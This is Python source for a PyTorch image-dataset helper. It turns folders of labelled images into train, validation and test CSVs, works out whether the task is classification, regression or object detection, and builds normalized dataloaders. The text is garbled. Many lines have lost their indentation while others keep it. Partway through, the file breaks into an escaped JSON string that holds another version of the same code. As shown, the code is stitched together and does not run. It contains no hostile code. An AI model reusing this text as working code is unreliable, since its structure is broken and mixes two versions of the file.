            train_csv, val_csv, test_csv = self.data_from_paths_to_csv(data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path,train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:,0])]
if self.extension:
img_names = add_extension(img_names,self.extension)
if val_csv:
val_csv_path = os.path.join(data_path,val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str,list(val_df.iloc[:,1])))
if test_csv:
test_csv_path = os.path.join(data_path,test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str,list(test_df.iloc[:,1])))
targets = list(map(str,list(train_df.iloc[:,1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
# bounding boxes
int_targets = [list(map(float,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
# one-hot classes
obj_targets = list(map(str,list(train_df.iloc[:,2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int,x)) for x in obj_split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(obj_split_targets,True)
# train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
# class indexes
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]
zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)
# print(zero_idx.shape)
for i,t in enumerate(zero_idx):
# temp_l = len(class_idx[i])
# if temp_l > 90:
# print(i,temp_l)
t[len(t)-len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
# self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int,x)) for x in split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label)
train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:,1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:,1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:,1] = target_ids
self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets
# self.models_path = os.path.join(self.data_dir, 'models')
# os.makedirs(self.models_path,exist_ok=True)
if not val_csv:
train_df,val_df = split_df(train_df,split_size)
if not test_csv:
val_df,test_df = split_df(val_df,split_size)
tr_images = [str(x) for x in list(train_df.iloc[:,0])]
val_images = [str(x) for x in list(val_df.iloc[:,0])]
test_images = [str(x) for x in list(test_df.iloc[:,0])]
if self.extension:
tr_images = add_extension(tr_images,self.extension)
val_images = add_extension(val_images,self.extension)
test_images = add_extension(test_images,self.extension)
train_df.iloc[:,0] = tr_images
val_df.iloc[:,0] = val_images
test_df.iloc[:,0] = test_images
train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)
val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)
test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)
self.minorities,self.class_diffs = None,None
if (not self.obj) or (not self.multi_label):
self.minorities,self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}
data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,
'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}
# save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))
self.data_dict = data_dict
return data_dict
    def data_from_paths_to_csv(self, data_path, tr_path, val_path=None, test_path=None):
        
        train_df = csv_from_path(tr_path, tr_path)
        train_df.to_csv(os.path.join(data_path, self.tr_name+'.csv'), index=False)
        # always return a (train, val, test) triple so the caller can unpack safely
        ret = (self.tr_name+'.csv', None, None)
        if val_path is not None:
            val_exists = os.path.exists(val_path)
            if val_exists:
                val_df = csv_from_path(val_path, tr_path)
                val_df.to_csv(os.path.join(data_path, self.val_name+'.csv'), index=False)
                ret = (self.tr_name+'.csv', self.val_name+'.csv', None)
        if test_path is not None:
            test_exists = os.path.exists(test_path)
            if test_exists:
                test_df = csv_from_path(test_path, tr_path)
                test_df.to_csv(os.path.join(data_path, self.test_name+'.csv'), index=False)
                ret = (self.tr_name+'.csv', self.val_name+'.csv', self.test_name+'.csv')
        return ret
def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,
bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],
data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.val_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.test_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
])}
# tta_tfms = {self.tr_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]),
# self.val_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]) }
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None,
self.test_name: None
}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
# resize_transform = transforms.RandomResizedCrop(s[0])
resize_transform = transforms.Resize(s)
        if not tfms:
            tfms = [resize_transform,
                    transforms.ToTensor(),
                    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
        else:
            # Splice caller-supplied transforms in after the resize but before
            # ToTensor/Normalize.
            tfms_temp = [resize_transform,
                         transforms.ToTensor(),
                         transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
            tfms_temp[1:1] = tfms
            tfms = tfms_temp
        print(tfms)
data_transforms = {
self.tr_name: tfms,
self.val_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
],
self.test_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
}
        # Estimate per-channel mean/std from a stats_percentage fraction of the
        # training set, then patch the Normalize transforms in place.
        temp_tfms = [resize_transform, transforms.ToTensor()]
        temp_dataset = dataset(os.path.join(data_dir, self.tr_name), data_dfs[self.tr_name], temp_tfms)
        self.img_mean, self.img_std = get_img_stats(temp_dataset, stats_percentage)
        for name in [self.tr_name, self.val_name, self.test_name]:
            data_transforms[name][-1].mean = self.img_mean
            data_transforms[name][-1].std = self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])
for x in [self.tr_name, self.val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj)
for x in [self.tr_name, self.val_name, self.test_name]}
        # Note: shuffle=True is applied to all three splits, including val/test.
        dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,
                                                      shuffle=True, num_workers=num_workers)
                       for x in [self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}
self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,
dataset_sizes)
return image_datasets,dataloaders,dataset_sizes
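    # Minimal usage sketch (paths and sizes are placeholders):
    #
    #   dp = DataProcessor(data_path='data/')
    #   image_datasets, dataloaders, sizes = dp.get_data(s=(224, 224), bs=32)
    #   xb, yb = next(iter(dataloaders['train']))   # xb.shape == (32, 3, 224, 224)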
def imshow(self,inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self,inp,calculate = False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
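    # denorm_img inverts Normalize: x = x_norm * std + mean, then clips to
    # [0, 1]. For example, with mean 0.485 and std 0.229 on the red channel,
    # a normalized value of 0.0 maps back to 0.485.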
    def show_data(self, folder_name='train', size=(64, 64), bs=5):
        # get_data's first positional parameter is data_dict, so size and bs
        # must be passed by keyword here.
        self.get_data(s=size, bs=bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0],batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
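    # e.g. dp.show_data('train', size=(64, 64), bs=5) displays a grid of five
    # training images titled with their class names.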
# def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):
    #     # print('Would you like to give your own values for anchor_grids, anchor_zooms, and anchor_ratios? The default values are: {}, {} and {}'
    #     #       .format(anc_grids, anc_zooms, anc_ratios))
    #     # print('If so, you may call the function "set_up_object_detection" with your own parameters.')
# cmap = get_cmap(num_colr)
# self.colr_list = [cmap(float(x)) for x in range(num_colr)]
# self.num_colr = num_colr
# self.create_anchors(anc_grids,anc_zooms,anc_ratios)
# self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)
# self.loss_f = FocalLoss(self.num_classes)
# def create_anchors(self,anc_grids,anc_zooms,anc_ratios):
# anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]
# k = len(anchor_scales)
# anc_offsets = [1/(o*2) for o in anc_grids]
# anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)
# anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])
# grid_sizes = torch.tensor(np.concatenate([np.array(
# [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])).float().unsqueeze(1).to(self.device)
# anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)
# anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])
# self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k
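    # Worked example for the (disabled) anchor construction above, assuming
    # the hypothetical defaults anc_grids=[4, 2, 1], anc_zooms=[0.7, 1.0, 1.3]
    # and anc_ratios=[(1., 1.), (1., 0.5), (0.5, 1.)]:
    #   k = len(anc_zooms) * len(anc_ratios) = 9 scales per grid cell, and
    #   the total anchor count is (4*4 + 2*2 + 1*1) * 9 = 189.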
0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n",
"step-5": "from dai_imports import*\nfrom obj_utils import*\nimport utils\n\nclass my_image_csv_dataset(Dataset):\n \n def __init__(self, data_dir, data, transforms_ = None, obj = False,\n minorities = None, diffs = None, bal_tfms = None):\n \n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n\n img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)\n\n y = self.data.iloc[index, 1] \n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms \n self.tfms = transforms.Compose(self.transforms_)\n # print(self.tfms)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else: \n self.tfms = transforms.Compose(self.transforms_) \n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s,tuple):\n s = s[0]\n row_scale = s/img.size[0]\n col_scale = s/img.size[1]\n y = rescale_bbox(y,row_scale,col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = (y,y2)\n return (x,y)\n\n\nclass my_image_folder(DatasetFolder):\n \n def __init__(self, root, transform=None, target_transform=None,\n loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):\n \n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self,index):\n \n path, target = self.samples[index] \n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self.transform )\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else: \n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\ndef extract_data(dt):\n\n x = []\n y = []\n for a,b in dt:\n x.append(a)\n y.append(b)\n return x,y\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)] \n\ndef get_minorities(df,thresh=0.8):\n\n c = df.iloc[:,1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [1-(x/max_count) for x in lc]\n diffs = dict((k,v) for k,v in zip(c.keys(),diffs))\n minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]\n return minorities,diffs\n\ndef csv_from_path(path, img_dest):\n\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = 
list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name,name)\n new_path = img_dest/new_name\n# print(new_path)\n os.rename(i,new_path)\n tr_images.append(new_name)\n tr_labels.append(label) \n # os.rmdir(l)\n tr_img_label = {'Img':tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\ndef add_extension(a,e):\n a = [x+e for x in a]\n return a\n\ndef one_hot(targets, multi = False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot,binerizer.classes_\n\ndef get_index(arr,a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\ndef rescale_bbox(bb,row_scale,col_scale):\n bb = bb.reshape((-1,4))\n for b in bb:\n r1,c1,r2,c2 = b\n b[0] = int(np.round(r1*col_scale))\n b[1] = int(np.round(c1*row_scale))\n b[2] = int(np.round(r2*col_scale))\n b[3] = int(np.round(c2*row_scale))\n\n # bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])\n # for b in bb:\n # r1,c1,r2,c2 = b\n # b[0] = int(np.round(r1*row_scale))\n # b[1] = int(np.round(c1*col_scale))\n # b[2] = int(np.round(r2*row_scale))\n # b[3] = int(np.round(c2*col_scale))\n # if(sum(b)) == 1:\n # b[0],b[1],b[2],b[3] = 0,0,0,0\n\n bb = bb.reshape((1,-1)) \n return bb\n\ndef get_img_stats(dataset,sz):\n\n size = int(len(dataset)*sz)\n i = 0\n imgs = []\n for img,_ in dataset:\n # print(img.size())\n if i > size:\n break\n imgs.append(img)\n i+=1\n imgs_ = torch.stack(imgs,dim=3)\n imgs_ = imgs_.view(3,-1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean,imgs_std\n\ndef split_df(train_df,test_size = 0.15):\n try: \n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])\n except:\n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)\n train_df = train_df.reset_index(drop = True)\n val_df = val_df.reset_index(drop = True)\n return train_df,val_df \n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\nclass DataProcessor:\n \n def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,\n tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):\n \n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n \n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n \n self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,\n val_csv,reg,tr_name,val_name,test_name,extension)\n \n self.obj = False\n self.multi_label = False\n \n if setup_data:\n self.set_up_data()\n \n def set_up_data(self,split_size = 0.15):\n\n data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)\n\n # check if paths given and also set paths\n \n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path,tr_name)\n val_path = 
os.path.join(data_path,val_name)\n test_path = os.path.join(data_path,test_name)\n\n if os.path.exists(os.path.join(data_path,tr_name+'.csv')):\n train_csv = tr_name+'.csv'\n # if os.path.exists(os.path.join(data_path,val_name+'.csv')):\n # val_csv = val_name+'.csv'\n # if os.path.exists(os.path.join(data_path,test_name+'.csv')):\n # test_csv = test_name+'.csv' \n\n # paths to csv\n\n if not train_csv:\n print('no')\n train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)\n\n train_csv_path = os.path.join(data_path,train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True \n img_names = [str(x) for x in list(train_df.iloc[:,0])]\n if self.extension:\n img_names = add_extension(img_names,self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path,val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str,list(val_df.iloc[:,1])))\n if test_csv:\n test_csv_path = os.path.join(data_path,test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str,list(test_df.iloc[:,1]))) \n targets = list(map(str,list(train_df.iloc[:,1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n\n # bounding boxes\n\n int_targets = [list(map(float,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n\n # one-hot classes\n\n obj_targets = list(map(str,list(train_df.iloc[:,2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int,x)) for x in obj_split_targets]\n except:\n pass\n dai_onehot,onehot_classes = one_hot(obj_split_targets,True)\n # train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n\n # class indexes\n\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]\n zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)\n # print(zero_idx.shape)\n for i,t in enumerate(zero_idx):\n # temp_l = len(class_idx[i])\n # if temp_l > 90:\n # print(i,temp_l)\n t[len(t)-len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n # self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])\n\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int,x)) for x in split_targets]\n except:\n pass\n dai_onehot,onehot_classes = 
one_hot(split_targets,self.multi_label)\n train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:,1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:,1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:,1] = target_ids \n self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets\n\n # self.models_path = os.path.join(self.data_dir, 'models')\n # os.makedirs(self.models_path,exist_ok=True)\n\n if not val_csv:\n train_df,val_df = split_df(train_df,split_size)\n if not test_csv: \n val_df,test_df = split_df(val_df,split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:,0])]\n val_images = [str(x) for x in list(val_df.iloc[:,0])]\n test_images = [str(x) for x in list(test_df.iloc[:,0])]\n if self.extension:\n tr_images = add_extension(tr_images,self.extension)\n val_images = add_extension(val_images,self.extension)\n test_images = add_extension(test_images,self.extension)\n train_df.iloc[:,0] = tr_images\n val_df.iloc[:,0] = val_images\n test_df.iloc[:,0] = test_images\n train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)\n val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)\n test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)\n self.minorities,self.class_diffs = None,None\n if (not self.obj) or (not self.multi_label):\n self.minorities,self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}\n data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,\n 'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}\n # save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):\n \n train_df = csv_from_path(tr_path,tr_path)\n train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',None)\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path,tr_path)\n val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv')\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path,tr_path)\n test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)\n ret = 